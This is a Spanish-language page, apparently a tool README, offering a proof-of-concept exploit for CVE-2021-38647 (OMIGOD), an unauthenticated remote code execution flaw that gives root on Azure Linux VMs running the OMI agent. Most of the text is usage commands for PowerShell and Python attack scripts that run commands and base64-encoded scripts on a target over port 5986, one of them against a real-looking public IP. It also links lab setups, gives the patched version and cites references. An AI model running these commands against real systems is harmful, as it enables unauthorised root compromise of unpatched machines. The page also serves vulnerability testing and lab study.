
CVE-2021-38647 - POC para explotar RCE no autenticado #OMIGOD
CVE-2021-38647 - POC para explotar RCE no autenticado #OMIGOD en máquinas virtuales UNIX/Linux de Azure!
En Microsoft Azure, la aplicación OMI se instala automáticamente cuando se utilizan servicios como Azure Automation Accounts, Update Management, Log Analytics, Configuration Management, etc., para máquinas virtuales UNIX/Linux. La aplicación OMI también expone el servicio a través del puerto 5986 si se utiliza el servicio Configuration Management para gestionar la máquina de forma remota.
Cualquier persona con acceso de red al endpoint vulnerable puede enviar una solicitud que aproveche el proveedor SCXcore sin el encabezado de Authorization y ejecutar comandos del sistema operativo en la máquina objetivo con privilegios de root!
Esta vulnerabilidad ya está corregida, pero siempre vale la pena comprobarla en máquinas virtuales Linux en Azure.
# Execute command on the target machine.
Invoke-CVE-2021-38647 -TargetIP 127.0.0.1 -TargetPort 5986 -Command whoami

# Execute script on the target machine.
$MyScript = @"
id
whoami
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
Invoke-CVE-2021-38647 -TargetIP 1.1.1.1 -TargetPort 5986 -Script $enc

# Execute command on the target machine.
python CVE-2021-38647.py -t 40.87.92.228 -p 5986 -c id

# Execute script on the target machine.
$MyScript = @"
id
whoami
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript)) # For Windows
echo 'id' | base64 # For Linux
python CVE-2021-38647.py -t 40.87.92.228 -s ZWNobyAiIg0KZWNobyAiSGVsbG8iDQplY2hvICJHb29kYnllIg==

ARM Template para desplegar en Azure - https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-38647-OMI
Desplegar sin Azure - https://rootsecdev.medium.com/creating-your-own-private-pwn-lab-for-omi-exploitation-b6919fc63956
Para mitigar la vulnerabilidad, debemos actualizar el agente OMI a la versión 1.6.8.1 o superior.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
https://rootsecdev.medium.com/creating-your-own-private-pwn-lab-for-omi-exploitation-b6919fc63956
https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-38647-OMI
https://www.alteredsecurity.com/post/omigod-cve-2021-38647
Equipo WIZ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
Este proyecto está destinado únicamente a fines educativos. El creador no se hace responsable del mal uso de esta herramienta.